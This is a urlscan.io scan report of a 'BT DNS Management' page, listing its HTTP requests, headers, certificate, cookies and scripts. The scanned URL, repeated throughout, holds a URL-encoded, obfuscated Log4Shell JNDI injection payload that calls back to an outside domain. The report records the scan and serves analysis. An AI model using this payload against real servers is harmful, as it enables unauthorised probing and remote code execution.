URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4...
Submission: On February 11 via manual from GB — Scanned from GB

Summary

This website contacted 2 IPs in 2 countries across 1 domain to perform 14 HTTP transactions. The main IP is 212.140.59.17, located in the United Kingdom, and belongs to BT-UK-AS BTnet UK Regional network, GB. The main domain is 212.140.59.17.
TLS certificate: Issued by GeoTrust EV RSA CA 2018 on April 7th 2021. Valid for: a year.
This is the only time 212.140.59.17 was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

Requests | IP Address | AS (Autonomous System)
12 | 212.140.59.17 | 2856 (BT-UK-AS ...)
2 | 2a00:1450:400... | 15169 (GOOGLE)
Totals: 14 requests, 2 IPs

Requests | Apex Domain / Subdomains | Transfer
2 | google-analytics.com (www.google-analytics.com — Cisco Umbrella Rank: 31) | 20 KB
Totals: 14 requests, 1 domain

Requests | Domain | Requested by
2 | www.google-analytics.com | 212.140.59.17, www.google-analytics.com
Totals: 14 requests, 1 domain

This site contains no links.

Subject | Issuer | Validity | Valid
dmc.bt.com | GeoTrust EV RSA CA 2018 | 2021-04-07 - 2022-04-12 | a year
*.google-analytics.com | GTS CA 1C3 | 2022-01-10 - 2022-04-04 | 3 months

This page contains 1 frame:

Primary Page: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Frame ID: B7A837BE712B5A03280AEA27A155FAE7
Requests: 14 HTTP requests in this frame

Page Title

BT DNS Management

Detected technologies

Overall confidence: 100%
Detected patterns
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js

Overall confidence: 100%
Detected patterns
  • <link[^>]* href=[^>]*?(?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)
  • (?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:.*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)

Overall confidence: 100%
Detected patterns
  • google-analytics\.com/(?:ga|urchin|analytics)\.js

Page Statistics

14
Requests

14 %
HTTPS

50 %
IPv6

1
Domains

1
Subdomains

2
IPs

2
Countries

851 kB
Transfer

1358 kB
Size

4
Cookies

14 HTTP transactions

Resource
Path
Size
x-fer
Type
MIME-Type
Primary Request /
212.140.59.17/
4 KB
6 KB
Document
General
Full URL
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
e52b96d95eb0d8602d5b8122841de0f22647118c1b842e817f2eb1ec08b7a00a
Security Headers
Name Value
Content-Security-Policy default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
Strict-Transport-Security max-age=631138519
X-Content-Type-Options nosniff
X-Frame-Options sameorigin
X-Xss-Protection 1; mode=block

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Accept-Language
en-GB,en;q=0.9

Response headers

Server
nginx
Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Type
text/html; charset=utf-8
Transfer-Encoding
chunked
Connection
keep-alive
Link
</fonts/btfont_rg-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_lt-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_bd-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_exbd-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/bootstrap/glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css>; rel=preload; as=style; nopush,</assets/application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js>; rel=preload; as=script; nopush,</assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js>; rel=preload; as=script; nopush
ETag
W/"e52b96d95eb0d8602d5b8122841de0f2"
Cache-Control
max-age=0, private, must-revalidate
X-Request-Id
cf278d79-a691-4f51-84bd-c6298b771ae5
X-Runtime
0.005550
Strict-Transport-Security
max-age=631138519
X-Frame-Options
sameorigin
X-Content-Type-Options
nosniff
X-XSS-Protection
1; mode=block
X-Download-Options
noopen
X-Permitted-Cross-Domain-Policies
none
Content-Security-Policy
default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
btfont_rg-webfont.woff2
212.140.59.17/fonts/
21 KB
21 KB
Font
General
Full URL
https://212.140.59.17/fonts/btfont_rg-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
25566080c82a531e2aa7f70525de2a4db4fa37b2cf7a41ea2e42290d463a4ec3

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5250"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21072
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_lt-webfont.woff2
212.140.59.17/fonts/
20 KB
20 KB
Font
General
Full URL
https://212.140.59.17/fonts/btfont_lt-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
c385dcaa5ae89a8f863894d3f96978f9448ff1ff2d13eb5e118084de1715664b

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5050"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
20560
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_bd-webfont.woff2
212.140.59.17/fonts/
21 KB
21 KB
Font
General
Full URL
https://212.140.59.17/fonts/btfont_bd-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
144f5ad13785cae9e493493e479fa9908e383b5ea1c086fd6a12ef783bca2edb

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-53a0"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21408
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_exbd-webfont.woff2
212.140.59.17/fonts/
21 KB
21 KB
Font
General
Full URL
https://212.140.59.17/fonts/btfont_exbd-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
1419ea0ac489572031eeb898cf3e43ea9f0efbc40941b97eac9b083fe67b137b

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5328"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21288
Expires
Sat, 11 Feb 2023 11:33:01 GMT
glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2
212.140.59.17/assets/bootstrap/
18 KB
18 KB
Font
General
Full URL
https://212.140.59.17/assets/bootstrap/glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Wed, 26 Apr 2017 00:07:59 GMT
Server
nginx
ETag
"58ffe4df-466c"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
18028
Expires
Sat, 11 Feb 2023 11:33:01 GMT
fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2
212.140.59.17/assets/font-awesome/
75 KB
76 KB
Font
General
Full URL
https://212.140.59.17/assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Wed, 26 Apr 2017 00:07:52 GMT
Server
nginx
ETag
"58ffe4d8-12d68"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
77160
Expires
Sat, 11 Feb 2023 11:33:01 GMT
application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
212.140.59.17/assets/
216 KB
38 KB
Stylesheet
General
Full URL
https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
14c32e9e7be6c6da3c961d8de7f1eed1ca8be8f02608fd27bb4356cc63865b8b

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Thu, 16 Dec 2021 13:11:25 GMT
Server
nginx
ETag
"61bb3afd-97dd"
Content-Type
text/css
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
38877
Expires
Sat, 11 Feb 2023 11:33:01 GMT
application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js
212.140.59.17/assets/
435 KB
129 KB
Script
General
Full URL
https://212.140.59.17/assets/application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Thu, 12 Aug 2021 08:04:28 GMT
Server
nginx
ETag
"6114d60c-2023d"
Content-Type
application/javascript
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
131645
Expires
Sat, 11 Feb 2023 11:33:01 GMT
analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
212.140.59.17/assets/
348 B
608 B
Script
General
Full URL
https://212.140.59.17/assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Tue, 25 Apr 2017 23:32:40 GMT
Server
nginx
ETag
"58ffdc98-10a"
Content-Type
application/javascript
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
266
Expires
Sat, 11 Feb 2023 11:33:01 GMT
bt-7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be.png
212.140.59.17/assets/
1 KB
2 KB
Image
General
Full URL
https://212.140.59.17/assets/bt-7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be.png
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Thu, 30 Jan 2020 13:47:33 GMT
Server
nginx
ETag
"5e32de75-509"
Content-Type
image/png
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
1289
Expires
Sat, 11 Feb 2023 11:33:01 GMT
analytics.js
www.google-analytics.com/
49 KB
20 KB
Script
General
Full URL
https://www.google-analytics.com/analytics.js
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:809::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
a1925038db769477ab74b4df34350c35688a795bb718727b0f4292a4a78a6210
Security Headers
Name Value
Strict-Transport-Security max-age=10886400; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

strict-transport-security
max-age=10886400; includeSubDomains; preload
content-encoding
gzip
x-content-type-options
nosniff
last-modified
Tue, 02 Nov 2021 17:39:06 GMT
server
Golfe2
age
7087
date
Fri, 11 Feb 2022 09:34:54 GMT
vary
Accept-Encoding
content-type
text/javascript
cache-control
public, max-age=7200
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length
20006
expires
Fri, 11 Feb 2022 11:34:54 GMT
fibres_small-1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d.jpg
212.140.59.17/assets/
477 KB
477 KB
Image
General
Full URL
https://212.140.59.17/assets/fibres_small-1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d.jpg
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Fri, 30 Apr 2021 15:35:47 GMT
Server
nginx
ETag
"608c23d3-7744d"
Content-Type
image/jpeg
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
488525
Expires
Sat, 11 Feb 2023 11:33:01 GMT
collect
www.google-analytics.com/j/
2 B
205 B
XHR
General
Full URL
https://www.google-analytics.com/j/collect?v=1&_v=j96&a=684503169&t=pageview&_s=1&dl=https%3A%2F%2F212.140.59.17%2F%3Fi3g4rm2j8tg5tu1%3D%2524%257B%2524%257Blower%253Ajndi%257D%253A%2524%257Blower%253Armi%257D%253A%252F%252Fx%257BhostName%257D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%257D&ul=en-us&de=UTF-8&dt=BT%20DNS%20Management&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=IEBAAEABAAAAAC~&jid=1088316207&gjid=813600176&cid=425173689.1644579182&tid=UA-75206843-1&_gid=1899576018.1644579182&_r=1&_slc=1&z=1642675816
Requested by
Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:809::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
a048e640908046be06e00eab37742b5d5ff80964af58cfd22f7cb2de4dfe375f
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

Referer
https://212.140.59.17/
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type
text/plain

Response headers

pragma
no-cache
date
Fri, 11 Feb 2022 11:33:01 GMT
x-content-type-options
nosniff
last-modified
Sun, 17 May 1998 03:00:00 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
https://212.140.59.17
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length
2
expires
Fri, 01 Jan 1990 00:00:00 GMT

15 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

  • function| structuredClone
  • boolean| windowIsTurbolinked
  • object| cookiesEu
  • function| $
  • function| jQuery
  • object| jQuery112407373762079572246
  • function| moment
  • object| App
  • function| Cookies
  • string| GoogleAnalyticsObject
  • function| ga
  • object| google_tag_data
  • object| gaplugins
  • object| gaGlobal
  • object| gaData

4 Cookies

Domain/Path Name / Value
212.140.59.17/ Name: _dmc_session
Value: a4265d4118b43ba1203d195dd366ca6c
212.140.59.17/ Name: _ga
Value: GA1.1.425173689.1644579182
212.140.59.17/ Name: _gid
Value: GA1.1.1899576018.1644579182
212.140.59.17/ Name: _gat
Value: 1

1 Console Messages

Source Level URL
Text
javascript warning URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Message:
The resource https://212.140.59.17/assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2 was preloaded using link preload but not used within a few seconds from the window's load event. Please make sure it has an appropriate `as` value and it is preloaded intentionally.

Security Headers

This page lists any security headers set by the main page.

Header Value
Content-Security-Policy default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
Strict-Transport-Security max-age=631138519
X-Content-Type-Options nosniff
X-Frame-Options sameorigin
X-Xss-Protection 1; mode=block